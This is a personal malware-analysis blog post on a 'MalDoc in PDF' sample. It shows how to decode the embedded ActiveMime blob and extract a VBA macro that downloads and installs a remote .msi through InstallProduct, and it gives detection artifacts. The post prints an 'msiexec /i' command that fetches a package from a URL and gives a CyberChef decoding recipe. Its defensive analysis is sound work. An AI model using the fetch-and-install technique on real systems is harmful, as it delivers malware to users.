Recently just came across with the JPCert blog which talks about MalDoc in PDF which is quite interesting and I’m just took the sample and start analyze on them. This blog will share my analysis and a interesting artifact that left behind when the maldoc starts an internet connection to next stage url.
It is recommend to read through their blogs for better understanding on the file structure.
Analysis
Thanks for Will Dormann’s X post which mentioned that the link tab with rel attributeEdit-Time-Data
will points to a base64 encoded ActiveMime blob. This would be a great start to begin the analysis.
In the malicious sample, it was found that the string in link tab with rel attribute Edit-Time-Data
has been URL encoded. The decoded URL string leads to a .jpg
file.
By following the .jpg
file, there is a large chunk of base64 strings which is bloated with CRLF (0x0d 0x0a) and spaces (0x20). This looks suspicious as other content data are in base64 too but there is no such anomaly pattern in their base64 string data.
In order to filter out the unrelated base64 strings, we can hex dump the content and pass it to CyberChef or your own script to clean up the data.
After cleaning the file, followed by the base64 decode, a notable magic header ActiveMime
appears right away which caught my attention.
Did a quick search on ActiveMime
strings in Google and it lead me to this blog from xpnsec which provides a way to deal with this kind of file. I will just re-implement his solution in CyberChef this time.
Basically just remove the first 50 bytes of the base64 decoded data (The one with ActiveMime
magic header) and zlib decompress it.
A successful decompress will give us a OLE file which can be saved and perform a full string dump it via oledump.py from Didier Stevens
From the vba macro code above, it will launch a windows installer function that call InstallProduct to download and install a .msi
installer file from a remote site once the user open the document (Usually there will have a warning before enabling the macro, so it won’t be execute directly 😌).
The InstallProduct
VBA function is equivalent to msiexec.exe
msiexec.exe /i https://server/share/package.msi
Interesting Artifact
It was quite interesting that it will generate a CreateFile
event on the C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86
folder path from MS Office which contains the full url of the next stage payload. It seems like the folder will be used store the .msi
file for installation.
Since it is running within a closed network, therefore there is no other events found after that. Therefore, I tried to simulate the behavior frommsiexec.exe
with a legit .msi url link to check for its full event.
Running a msiexec.exe
on a random .msi
file (in this case is orca.msi
) shows similar url pattern in the default download path.
Based on the blog in Microsoft:
If the installation database is at a URL, the installer downloads the database to a cache location before starting the installation.
The cache location is in
%windir%\installer
and it is system protected folder.
When the orca.msi
file from the target url started to receive by the machine successfully (When a installation prompt is shown), its initiating process tries to create a copy of the .msi
file with some hashed file name (In this case is 77f4f0.msi
) into the cache folder. However, there is no actual file created yet in the cache file.
The 77f4f0.msi
file created after Install
button was clicked where the installer starts to drop all its file into the machine.
Besides those behavioral indicator, we can check for any file with .doc
extension (not limit to that) that identify as PDF
file that create a outbound connection to suspicious url.
These artifact can be a good indicator to hunt for those suspicious .msi url download activities.
References
https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html
https://blog.xpnsec.com/apt32-phishing-malware/
https://twitter.com/wdormann/status/1696197904262742370
https://learn.microsoft.com/en-us/dotnet/api/system.environment.specialfolder?view=net-7.0
CyberChef recipe to decode the suspicious base64 payload
Find_/_Replace({'option':'Regex','string':'(0D 0A |20)'},'',true,false,true,false)
From_Hex('Auto')
From_Base64('A-Za-z0-9+/=',true,false)
Drop_bytes(0,50,false)
Zlib_Inflate(0,0,'Adaptive',false,false)
To_Hexdump(16,false,false,false)